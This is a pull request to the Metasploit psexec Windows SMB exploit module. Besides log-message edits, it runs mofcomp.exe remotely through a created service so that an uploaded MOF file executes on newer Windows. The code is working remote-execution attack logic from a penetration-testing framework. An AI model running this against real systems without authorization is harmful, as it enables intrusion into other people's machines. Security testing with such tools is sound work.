### PR TITLE
Make psexec work on newer Windows with MOF upload

### DIFF
--- a/lib/msf/core/exploit/smb/psexec.rb
+++ b/lib/msf/core/exploit/smb/psexec.rb
@@ -34,7 +34,7 @@ module Exploit::Remote::SMB::Psexec
       simple.disconnect("\\\\#{host}\\#{smbshare}")
       return contents
     rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
-      print_error("#{peer} - Unable to read file #{file}. #{e.class}: #{e}.")
+      print_error("#{rhost}:#{rport} - Unable to read file #{file}. #{e.class}: #{e}.")
       return nil
     end
   end
@@ -56,10 +56,10 @@ module Exploit::Remote::SMB::Psexec
   def psexec(command)
     simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
     handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
-    vprint_status("#{peer} - Binding to #{handle} ...")
+    vprint_status("#{rhost}:#{rport} - Binding to #{handle} ...")
     dcerpc_bind(handle)
-    vprint_status("#{peer} - Bound to #{handle} ...")
-    vprint_status("#{peer} - Obtaining a service manager handle...")
+    vprint_status("#{rhost}:#{rport} - Bound to #{handle} ...")
+    vprint_status("#{rhost}:#{rport} - Obtaining a service manager handle...")
     scm_handle = nil
     stubdata = NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F)
     begin
@@ -68,7 +68,7 @@ module Exploit::Remote::SMB::Psexec
         scm_handle = dcerpc.last_response.stub_data[0,20]
       end
     rescue ::Exception => e
-      print_error("#{peer} - Error getting scm handle: #{e}")
+      print_error("#{rhost}:#{rport} - Error getting scm handle: #{e}")
       return false
     end
     servicename = Rex::Text.rand_text_alpha(11)
@@ -91,22 +91,22 @@ module Exploit::Remote::SMB::Psexec
       NDR.long(0) + # Password
       NDR.long(0) # Password
     begin
-      vprint_status("#{peer} - Creating the service...")
+      vprint_status("#{rhost}:#{rport} - Creating the service...")
       response = dcerpc.call(0x0c, stubdata)
       if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
         svc_handle = dcerpc.last_response.stub_data[0,20]
         svc_status = dcerpc.last_response.stub_data[24,4]
       end
     rescue ::Exception => e
-      print_error("#{peer} - Error creating service: #{e}")
+      print_error("#{rhost}:#{rport} - Error creating service: #{e}")
       return false
     end
-    vprint_status("#{peer} - Closing service handle...")
+    vprint_status("#{rhost}:#{rport} - Closing service handle...")
     begin
       response = dcerpc.call(0x0, svc_handle)
     rescue ::Exception
     end
-    vprint_status("#{peer} - Opening service...")
+    vprint_status("#{rhost}:#{rport} - Opening service...")
     begin
       stubdata = scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF)
       response = dcerpc.call(0x10, stubdata)
@@ -114,33 +114,33 @@ module Exploit::Remote::SMB::Psexec
         svc_handle = dcerpc.last_response.stub_data[0,20]
       end
     rescue ::Exception => e
-      print_error("#{peer} - Error opening service: #{e}")
+      print_error("#{rhost}:#{rport} - Error opening service: #{e}")
       return false
     end
-    vprint_status("#{peer} - Starting the service...")
+    vprint_status("#{rhost}:#{rport} - Starting the service...")
     stubdata = svc_handle + NDR.long(0) + NDR.long(0)
     begin
       response = dcerpc.call(0x13, stubdata)
       if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
       end
     rescue ::Exception => e
-      print_error("#{peer} - Error starting service: #{e}")
+      print_error("#{rhost}:#{rport} - Error starting service: #{e}")
       return false
     end
-    vprint_status("#{peer} - Removing the service...")
+    vprint_status("#{rhost}:#{rport} - Removing the service...")
     stubdata = svc_handle
     begin
       response = dcerpc.call(0x02, stubdata)
       if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
       end
     rescue ::Exception => e
-      print_error("#{peer} - Error removing service: #{e}")
+      print_error("#{rhost}:#{rport} - Error removing service: #{e}")
     end
-    vprint_status("#{peer} - Closing service handle...")
+    vprint_status("#{rhost}:#{rport} - Closing service handle...")
     begin
       response = dcerpc.call(0x0, svc_handle)
     rescue ::Exception => e
-      print_error("#{peer} - Error closing service handle: #{e}")
+      print_error("#{rhost}:#{rport} - Error closing service handle: #{e}")
     end
     select(nil, nil, nil, 1.0)
     simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$")

--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Auxiliary::Report
   include Msf::Exploit::EXE
   include Msf::Exploit::WbemExec
+  include Msf::Exploit::Remote::SMB::Psexec
 
   def initialize(info = {})
     super(update_info(info,
@@ -148,7 +149,10 @@ class Metasploit3 < Msf::Exploit::Remote
       fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
       fd << mof
       fd.close
-      print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
+      mof_path = "%SystemRoot%\\system32\\wbem\\mof\\#{mofname}"
+      print_status("Created #{mof_path}")
+      mofcomp_command = "%SystemRoot%\\system32\\wbem\\mofcomp.exe #{mof_path}"
+      psexec(mofcomp_command)
 
       # Disconnect from the ADMIN$
       simple.disconnect("ADMIN$")


### PR DESCRIPTION
This PR modifies the MOF_UPLOAD method of psexec
so that it works properly on newer versions of windows.
